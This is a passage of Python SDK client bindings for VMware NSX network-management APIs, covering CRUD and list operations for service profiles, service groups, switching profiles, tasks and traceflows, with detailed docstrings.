        super(NsProfiles, self).__init__(config, _NsProfilesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ns_profile):
        """
        Creates a new NSProfile which allows users to encapsulate attribute
        and sub-attributes of network services. Rules for using attributes
        and sub-attributes in a single NSProfile: 1. One type of attribute
        can't have multiple occurrences (e.g. attribute type APP_ID can be
        used only once per NSProfile). 2. Values for an attribute are given
        as an array of strings (e.g. for type APP_ID, [\"SSL\",\"FTP\"]).
        3. If sub-attributes are given for an attribute, only a single value
        is allowed for that attribute. 4. For the list of supported
        attributes and sub-attributes issue
        GET https://<nsx-mgr>/api/v1/ns-profiles/attributes

        :type  ns_profile: :class:`com.vmware.nsx.model_client.NSProfile`
        :param ns_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSProfile`
        :return: com.vmware.nsx.model.NSProfile
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('create', dict(ns_profile=ns_profile))

    def delete(self, ns_profile_id, force=None):
        """
        Deletes the specified NSProfile. By default, if the NSProfile is
        consumed in a Firewall rule, it won't get deleted; pass
        \"force=true\" as a query param to force delete it in that situation.

        :type  ns_profile_id: :class:`str`
        :param ns_profile_id: NSProfile Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('delete',
                            dict(ns_profile_id=ns_profile_id, force=force))

    def get(self, ns_profile_id):
        """
        Returns information about the specified NSProfile.

        :type  ns_profile_id: :class:`str`
        :param ns_profile_id: NSProfile Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSProfile`
        :return: com.vmware.nsx.model.NSProfile
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('get', dict(ns_profile_id=ns_profile_id))

    def list(self,
             attribute_type=None,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None):
        """
        List the NSProfiles created, in a paginated format. The page size is
        restricted to 50 NSProfiles so that the size of the response remains
        small even when there are a high number of NSProfiles with multiple
        attributes and multiple attribute values per attribute.

        :type  attribute_type: :class:`str` or ``None``
        :param attribute_type: Fetch NSProfiles for the given attribute type
            (optional)
        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NSProfileListResult`
        :return: com.vmware.nsx.model.NSProfileListResult
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        query = dict(attribute_type=attribute_type,
                     cursor=cursor,
                     included_fields=included_fields,
                     page_size=page_size,
                     sort_ascending=sort_ascending,
                     sort_by=sort_by)
        return self._invoke('list', query)

    def update(self, ns_profile_id, ns_profile):
        """
        Updates the specified NSProfile. Rules for using attributes and
        sub-attributes in a single NSProfile: 1. One type of attribute can't
        have multiple occurrences (e.g. attribute type APP_ID can be used
        only once per NSProfile). 2. Values for an attribute are given as an
        array of strings (e.g. for type APP_ID, [\"SSL\",\"FTP\"]). 3. If
        sub-attributes are given for an attribute, only a single value is
        allowed for that attribute. 4. For the list of supported attributes
        and sub-attributes issue
        GET https://<nsx-mgr>/api/v1/ns-profiles/attributes

        :type  ns_profile_id: :class:`str`
        :param ns_profile_id: NSProfile Id (required)
        :type  ns_profile: :class:`com.vmware.nsx.model_client.NSProfile`
        :param ns_profile: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSProfile`
        :return: com.vmware.nsx.model.NSProfile
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('update',
                            dict(ns_profile_id=ns_profile_id,
                                 ns_profile=ns_profile))
class NsServiceGroups(VapiInterface):
    """Client bindings for the ``com.vmware.nsx.ns_service_groups`` service."""

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ns_service_groups'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(NsServiceGroups, self).__init__(config, _NsServiceGroupsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ns_service_group):
        """
        Creates a new NSServiceGroup which can contain NSServices. A given
        NSServiceGroup can contain either only ether type NSServices or only
        non-ether type NSServices, i.e. it cannot contain a mix of both ether
        and non-ether types of NSServices.

        :type  ns_service_group: :class:`com.vmware.nsx.model_client.NSServiceGroup`
        :param ns_service_group: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
        :return: com.vmware.nsx.model.NSServiceGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('create',
                            dict(ns_service_group=ns_service_group))

    def delete(self, ns_service_group_id, force=None):
        """
        Deletes the specified NSServiceGroup. By default, if the
        NSServiceGroup is consumed in a Firewall rule, it won't get deleted;
        pass \"force=true\" as a query param to force delete it in that
        situation.

        :type  ns_service_group_id: :class:`str`
        :param ns_service_group_id: NSServiceGroup Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``ConcurrentChange``, ``Unauthorized`` or ``NotFound``) on
            server-side failure.
        """
        return self._invoke('delete',
                            dict(ns_service_group_id=ns_service_group_id,
                                 force=force))

    def get(self, ns_service_group_id):
        """
        Returns information about the specified NSServiceGroup.

        :type  ns_service_group_id: :class:`str`
        :param ns_service_group_id: NSServiceGroup Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
        :return: com.vmware.nsx.model.NSServiceGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('get',
                            dict(ns_service_group_id=ns_service_group_id))

    def list(self,
             cursor=None,
             default_service=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None):
        """
        Returns paginated list of NSServiceGroups.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  default_service: :class:`bool` or ``None``
        :param default_service: Fetch all default NSServiceGroups (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NSServiceGroupListResult`
        :return: com.vmware.nsx.model.NSServiceGroupListResult
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        query = dict(cursor=cursor,
                     default_service=default_service,
                     included_fields=included_fields,
                     page_size=page_size,
                     sort_ascending=sort_ascending,
                     sort_by=sort_by)
        return self._invoke('list', query)

    def update(self, ns_service_group_id, ns_service_group):
        """
        Updates the specified NSServiceGroup. Modifiable parameters include
        the description, display_name and members.

        :type  ns_service_group_id: :class:`str`
        :param ns_service_group_id: NSServiceGroup Id (required)
        :type  ns_service_group: :class:`com.vmware.nsx.model_client.NSServiceGroup`
        :param ns_service_group: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSServiceGroup`
        :return: com.vmware.nsx.model.NSServiceGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``ConcurrentChange``, ``Unauthorized`` or ``NotFound``) on
            server-side failure.
        """
        return self._invoke('update',
                            dict(ns_service_group_id=ns_service_group_id,
                                 ns_service_group=ns_service_group))
class NsServices(VapiInterface):
    """Client bindings for the ``com.vmware.nsx.ns_services`` service."""

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ns_services'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(NsServices, self).__init__(config, _NsServicesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, ns_service):
        """
        Creates a new NSService which allows users to specify characteristics
        to use for matching network traffic.

        :type  ns_service: :class:`com.vmware.nsx.model_client.NSService`
        :param ns_service: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSService`
        :return: com.vmware.nsx.model.NSService
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('create', dict(ns_service=ns_service))

    def delete(self, ns_service_id, force=None):
        """
        Deletes the specified NSService. By default, if the NSService is
        being referred in an NSServiceGroup, it can't be deleted; pass
        \"force=true\" as a parameter to force delete it in that situation.
        System defined NSServices can't be deleted using the \"force\" flag.

        :type  ns_service_id: :class:`str`
        :param ns_service_id: NSService Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``ConcurrentChange``, ``Unauthorized`` or ``NotFound``) on
            server-side failure.
        """
        return self._invoke('delete',
                            dict(ns_service_id=ns_service_id, force=force))

    def get(self, ns_service_id):
        """
        Returns information about the specified NSService.

        :type  ns_service_id: :class:`str`
        :param ns_service_id: NSService Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSService`
        :return: com.vmware.nsx.model.NSService
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('get', dict(ns_service_id=ns_service_id))

    def list(self,
             cursor=None,
             default_service=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None):
        """
        Returns paginated list of NSServices.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  default_service: :class:`bool` or ``None``
        :param default_service: Fetch all default NSServices (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NSServiceListResult`
        :return: com.vmware.nsx.model.NSServiceListResult
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        query = dict(cursor=cursor,
                     default_service=default_service,
                     included_fields=included_fields,
                     page_size=page_size,
                     sort_ascending=sort_ascending,
                     sort_by=sort_by)
        return self._invoke('list', query)

    def update(self, ns_service_id, ns_service):
        """
        Updates the specified NSService. Modifiable parameters include the
        description, display_name and the NSService element. The system
        defined NSServices can't be modified.

        :type  ns_service_id: :class:`str`
        :param ns_service_id: NSService Id (required)
        :type  ns_service: :class:`com.vmware.nsx.model_client.NSService`
        :param ns_service: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSService`
        :return: com.vmware.nsx.model.NSService
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``ConcurrentChange``, ``Unauthorized`` or ``NotFound``) on
            server-side failure.
        """
        return self._invoke('update',
                            dict(ns_service_id=ns_service_id,
                                 ns_service=ns_service))
class ServiceConfigs(VapiInterface):
    """
    CRUD operations on NSX service configs, which group profiles and
    configurations together.
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.service_configs'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _ServiceConfigsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, service_config):
        """
        Create a new service config that can group profiles and configs.

        :type  service_config: :class:`com.vmware.nsx.model_client.ServiceConfig`
        :param service_config: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
        :return: com.vmware.nsx.model.ServiceConfig
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'service_config': service_config}
        return self._invoke('create', payload)

    def delete(self, config_set_id):
        """
        Delete the specified service config.

        :type  config_set_id: :class:`str`
        :param config_set_id: Service Config Id (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'config_set_id': config_set_id}
        return self._invoke('delete', payload)

    def get(self, config_set_id):
        """
        Return information about the specified service config.

        :type  config_set_id: :class:`str`
        :param config_set_id: Service Config Id (required)
        :rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
        :return: com.vmware.nsx.model.ServiceConfig
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'config_set_id': config_set_id}
        return self._invoke('get', payload)

    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             profile_type=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all service configs.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  profile_type: :class:`str` or ``None``
        :param profile_type: Fetch ServiceConfig for the given attribute
            profile_type (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.ServiceConfigListResult`
        :return: com.vmware.nsx.model.ServiceConfigListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'profile_type': profile_type,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', payload)

    def update(self, config_set_id, service_config):
        """
        Update the specified ServiceConfig.

        :type  config_set_id: :class:`str`
        :param config_set_id: Service Config Id (required)
        :type  service_config: :class:`com.vmware.nsx.model_client.ServiceConfig`
        :param service_config: (required)
        :rtype: :class:`com.vmware.nsx.model_client.ServiceConfig`
        :return: com.vmware.nsx.model.ServiceConfig
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'config_set_id': config_set_id,
            'service_config': service_config,
        }
        return self._invoke('update', payload)
class SwitchingProfiles(VapiInterface):
    """
    Operations on NSX switching profiles (qos, port-mirroring, spoof-guard,
    port-security, ipfix, ip-discovery).
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.switching_profiles'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _SwitchingProfilesStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, base_switching_profile):
        """
        Create a new, custom qos, port-mirroring, spoof-guard or
        port-security switching profile. Default switching profile
        assignments can be overridden by creating a new switching profile
        and assigning it to one or more logical switches. The default ipfix
        or ip_discovery switching profiles cannot be overridden.

        :type  base_switching_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param base_switching_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseSwitchingProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'base_switching_profile': base_switching_profile}
        return self._invoke('create', payload)

    def delete(self, switching_profile_id, unbind=None):
        """
        Delete the specified switching profile.

        :type  switching_profile_id: :class:`str`
        :param switching_profile_id: (required)
        :type  unbind: :class:`bool` or ``None``
        :param unbind: force unbinding of logical switches and ports from a
            switching profile (optional, default to false)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'switching_profile_id': switching_profile_id,
            'unbind': unbind,
        }
        return self._invoke('delete', payload)

    def get(self, switching_profile_id):
        """
        Return information about a specified switching profile.

        :type  switching_profile_id: :class:`str`
        :param switching_profile_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseSwitchingProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'switching_profile_id': switching_profile_id}
        return self._invoke('get', payload)

    def list(self,
             cursor=None,
             include_system_owned=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             switching_profile_type=None,
             ):
        """
        Return information about the system-default and user-configured
        switching profiles. Each switching profile has a unique ID, a
        display name, and various other read-only and configurable
        properties. The default switching profiles are assigned
        automatically to each switch.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  include_system_owned: :class:`bool` or ``None``
        :param include_system_owned: Whether the list result contains system
            resources (optional, default to false)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  switching_profile_type: :class:`str` or ``None``
        :param switching_profile_type: comma-separated list of switching
            profile types, e.g.
            ?switching_profile_type=QosSwitchingProfile,IpDiscoverySwitchingProfile
            (optional)
        :rtype: :class:`com.vmware.nsx.model_client.SwitchingProfilesListResult`
        :return: com.vmware.nsx.model.SwitchingProfilesListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'include_system_owned': include_system_owned,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'switching_profile_type': switching_profile_type,
        }
        return self._invoke('list', payload)

    def update(self, switching_profile_id, base_switching_profile):
        """
        Update the user-configurable parameters of a switching profile.
        Only the qos, port-mirroring, spoof-guard and port-security
        switching profiles can be modified; the ipfix or ip-discovery
        switching profiles cannot.

        :type  switching_profile_id: :class:`str`
        :param switching_profile_id: (required)
        :type  base_switching_profile: :class:`vmware.vapi.struct.VapiStruct`
        :param base_switching_profile: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.BaseSwitchingProfile
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.BaseSwitchingProfile`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'switching_profile_id': switching_profile_id,
            'base_switching_profile': base_switching_profile,
        }
        return self._invoke('update', payload)
class Tasks(VapiInterface):
    """
    Read access to NSX task status.
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.tasks'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TasksStub)
        self._VAPI_OPERATION_IDS = {}

    def get(self, task_id):
        """
        Get information about the specified task.

        :type  task_id: :class:`str`
        :param task_id: ID of task to read (required)
        :rtype: :class:`com.vmware.nsx.model_client.TaskProperties`
        :return: com.vmware.nsx.model.TaskProperties
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'task_id': task_id}
        return self._invoke('get', payload)

    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             request_uri=None,
             sort_ascending=None,
             sort_by=None,
             status=None,
             user=None,
             ):
        """
        Get information about all tasks.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  request_uri: :class:`str` or ``None``
        :param request_uri: Request URI(s) to include in query result
            (optional)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type  status: :class:`str` or ``None``
        :param status: Status(es) to include in query result (optional)
        :type  user: :class:`str` or ``None``
        :param user: Names of users to include in query result (optional)
        :rtype: :class:`com.vmware.nsx.model_client.TaskListResult`
        :return: com.vmware.nsx.model.TaskListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'request_uri': request_uri,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'status': status,
            'user': user,
        }
        return self._invoke('list', payload)
class Traceflows(VapiInterface):
    """
    Operations to initiate, inspect and delete Traceflow rounds.
    """
    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.traceflows'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        VapiInterface.__init__(self, config, _TraceflowsStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, traceflow_request):
        """
        Initiate a Traceflow operation on the specified port.

        :type  traceflow_request: :class:`com.vmware.nsx.model_client.TraceflowRequest`
        :param traceflow_request: (required)
        :rtype: :class:`com.vmware.nsx.model_client.Traceflow`
        :return: com.vmware.nsx.model.Traceflow
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'traceflow_request': traceflow_request}
        return self._invoke('create', payload)

    def delete(self, traceflow_id):
        """
        Delete the Traceflow round.

        :type  traceflow_id: :class:`str`
        :param traceflow_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound` Not Found
        """
        payload = {'traceflow_id': traceflow_id}
        return self._invoke('delete', payload)

    def get(self, traceflow_id):
        """
        Get the Traceflow round status and result summary.

        :type  traceflow_id: :class:`str`
        :param traceflow_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.Traceflow`
        :return: com.vmware.nsx.model.Traceflow
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable` Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest` Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError` Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized` Forbidden
